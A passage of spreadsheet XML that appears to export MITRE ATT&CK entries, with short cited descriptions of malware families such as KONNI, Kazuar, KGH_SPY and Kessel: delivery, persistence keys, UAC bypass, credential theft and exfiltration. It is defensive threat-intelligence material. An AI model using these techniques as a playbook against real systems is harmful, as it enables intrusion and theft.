    <t>[Javali](https://attack.mitre.org/software/S0528) can use DLL side-loading to load malicious DLLs into legitimate executables.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can read C2 information from Google Documents and YouTube.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can download payloads from remote C2 servers.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims clicking links to malicious websites.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has used the MSI installer to download and execute malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can monitor processes for open browsers and custom banking applications.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has been delivered as malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has been delivered via malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) has used embedded VBScript to download malicious payloads from C2.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can use public cloud-based storage providers for command and control.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can upload and download files, including second-stage malware.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) can collect system information.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has the capability to delete files off the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to search for files on the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can upload files to the victim’s machine and can download additional payloads.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to create Registry entries for storing data under &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath&lt;/code&gt;.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can obtain a list of running processes on the system.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can capture screenshots of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) uses a customized XOR algorithm to encrypt C2 communications.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) has the capability to collect the computer name, language settings, the OS version, CPU information, disk devices, and time elapsed since system start.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) gathers the MAC address of the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KEYMARBLE](https://attack.mitre.org/software/S0271) can execute shell commands using cmd.exe.(Citation: US-CERT KEYMARBLE Aug 2018)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from WINSCP.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to steal data from the Chrome, Edge, Firefox, Thunderbird, and Opera browsers.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can send a file containing victim system information to C2.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can decrypt encrypted strings and write them to a newly created folder.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can exfiltrate collected information from the host to the C2 server.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can enumerate files and directories on a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to download and execute code from remote servers.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can perform keylogging by polling the &lt;code&gt;GetAsyncKeyState()&lt;/code&gt; function.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can save collected system information to a file named "info" before exfiltration.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can harvest data from mail clients.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to set the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key to execute logon scripts.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has been spread through Word documents containing malicious macros.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has masqueraded as a legitimate Windows tool.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has used encrypted strings in its installer.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can execute PowerShell commands on the victim's machine.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect information on installed applications.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect drive information from a compromised host.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can send data to C2 with HTTP POST requests.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) has the ability to set a Registry key to run a cmd.exe command.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KGH_SPY](https://attack.mitre.org/software/S0526) can collect credentials from the Windows Credential Manager.(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) will perform UAC bypass either through fodhelper.exe or eventvwr.exe.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) can delete created registry keys used for persistence as part of its cleanup procedure.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has deobfuscated itself before executing its commands.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has used &lt;code&gt;-WindowsStyle Hidden&lt;/code&gt; to hide the command window.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has executed a PowerShell command to download a file to the system.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[KOCTOPUS](https://attack.mitre.org/software/S0669) has relied on victims clicking a malicious document for execution.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has relied on victims clicking on a malicious link delivered via email.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[KOCTOPUS](https://attack.mitre.org/software/S0669) has been disguised as legitimate software programs associated with the travel and airline industries.(Citation: MalwareBytes LazyScripter Feb 2021) </t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has added and deleted keys from the Registry.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) can use the `LoadResource` and `CreateProcessW` APIs for execution.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has obfuscated scripts with the BatchEncryption tool.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has used PowerShell commands to download additional files.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) can set the AutoRun Registry key with a PowerShell command.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has been distributed via spearphishing emails with malicious attachments.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has been distributed as a malicious link within an email.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has checked the OS version using `wmic.exe` and the `find` command.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has used VBScript to call wscript to execute a PowerShell command.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOCTOPUS](https://attack.mitre.org/software/S0669) has used `cmd.exe` and batch files for execution.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of retrieving information about the infected system.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of creating a reverse shell.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of running WMI queries.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has encrypted data and files prior to exfiltration.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to “AlwaysNotify".(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) had a feature to steal data from the clipboard.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has modified ComSysApp service to load the malicious DLL payload.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can steal profiles (containing credential information) from Firefox, Chrome, and Opera.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has stored collected information and discovered processes in a tmp file.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used certutil to download and decode base64 encoded strings and has also devoted a custom section to performing all the components of the deobfuscation process.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has sent data and files to its C2 server.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021)(Citation: Malwarebytes KONNI Evolves Jan 2022)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used FTP to exfiltrate reconnaissance data out.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can delete files.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) can download files and execute them on the victim’s machine.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has executed malicious JavaScript code.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has the capability to perform keylogging.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has relied on a victim to enable malicious macros within an attachment delivered via email.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has pretended to be the xmlProv Network Provisioning service.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has created a shortcut called "Anti virus service.lnk" in an apparent attempt to masquerade as a legitimate file.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has hardcoded API calls within its functions to use on the victim's machine.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) is heavily obfuscated and includes encrypted configuration files.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) used PowerShell to download and execute a specific 64-bit version of the malware.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used the command &lt;code&gt;cmd /c tasklist&lt;/code&gt; to get a snapshot of the current processes on the target machine.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) has dropped a Windows shortcut into the Startup folder to establish persistence.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used Rundll32 to execute its loader for privilege escalation purposes.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can take screenshots of the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) drops a Windows shortcut on the victim’s machine to establish persistence.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has been packed for obfuscation.(Citation: Malwarebytes KONNI Evolves Jan 2022)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has been delivered via spearphishing campaigns through a malicious Word document.(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used a custom base64 key to encode stolen data before exfiltration.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used AES to encrypt C2 traffic.(Citation: Malwarebytes KONNI Evolves Jan 2022)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can gather the OS version, architecture information, connected drives, hostname, RAM size, and disk space information from the victim’s machine and has used &lt;code&gt;cmd /c systeminfo&lt;/code&gt; command to get a snapshot of the current system state of the target machine.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can collect the IP address from the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has used &lt;code&gt;net session&lt;/code&gt; on the victim's machine.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can collect the username from the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used HTTP POST for C2.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection chain.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has registered itself as a service using its export function.(Citation: Malwarebytes Konni Aug 2021) </t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to change firewall settings to allow a plug-in to be downloaded.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to search for a given filename on a victim.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to download and execute additional files.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to search for a given process name in processes currently running in the system.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) creates a Registry Run key to establish persistence.(Citation: Zscaler Kasidet)(Citation: Microsoft Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging and screen captures.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to identify any anti-virus installed on the infected system.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to obtain a victim's system name and operating system version.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) can execute commands using cmd.exe.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about opened windows.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) has used compromised WordPress blogs as C2 servers.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can overwrite files with random data before deleting them.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uploads files from a specified directory to the C2 server.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>If running in a Windows environment, [Kazuar](https://attack.mitre.org/software/S0265) saves a DLL to disk that is injected into the explorer.exe process to execute the payload. [Kazuar](https://attack.mitre.org/software/S0265) can also be configured to inject and execute within specific processes.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can accept multiple URLs for C2 servers.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can delete files.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses FTP and FTPS to communicate with the C2 server.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) finds a specified directory, lists the files and metadata about those files.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) has used internal nodes on the compromised network for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on local groups and members on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) stages command output and collected data in files before exfiltration.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about local groups and members.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) is obfuscated using the open source ConfuserEx protector. [Kazuar](https://attack.mitre.org/software/S0265) also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying and the &lt;code&gt;ps&lt;/code&gt; command.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) adds a sub-key under several Registry run keys.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can sleep for a specific time and be set to communicate at specific intervals.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) captures screenshots of the victim’s screen.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) adds a .lnk file to the Windows startup folder.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) encodes communications to the C2 server in Base64.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on the system and local drives.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about network adapters.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on users.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses /bin/bash to execute commands on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) captures images from the webcam.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses HTTP and HTTPS to communicate with the C2 server. [Kazuar](https://attack.mitre.org/software/S0265) can also act as a webserver and listen for inbound HTTP requests through an exposed API.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses cmd.exe to execute commands on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can install itself as a new service.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can use DLL side-loading to load malicious DLLs.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can decode, decrypt, and decompress multiple layers of shellcode.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can download specific payloads to a compromised host based on OS architecture.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has gained execution through victims opening malicious files.(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has gained execution through victims opening malicious links.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can encrypt, encode, and compress multiple layers of shellcode.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed through malicious e-mail attachments.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed via e-mails containing a malicious link.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has the ability to determine if the compromised host is running a 32 or 64 bit OS architecture.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can use a VBS base64 decoder function published by Motobit.(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Kessel](https://attack.mitre.org/software/S0487) can RC4-encrypt credentials before sending to the C2.(Citation: ESET ForSSHe December 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Kessel](https://attack.mitre.org/software/S0487) can create a reverse shell between the infected host and a specified system.(Citation: ESET ForSSHe December 2018)	</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has decrypted the binary's configuration once the &lt;code&gt;main&lt;/code&gt; function was launched.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated information gathered from the infected system to the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has trojanized the &lt;sode&gt;ssh_login&lt;/code&gt; and &lt;code&gt;user-auth_pubkey&lt;/code&gt; functions to steal plaintext credentials.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487)'s configuration is hardcoded and RC4 encrypted within the binary.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can use a proxy during exfiltration if set in the configuration.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
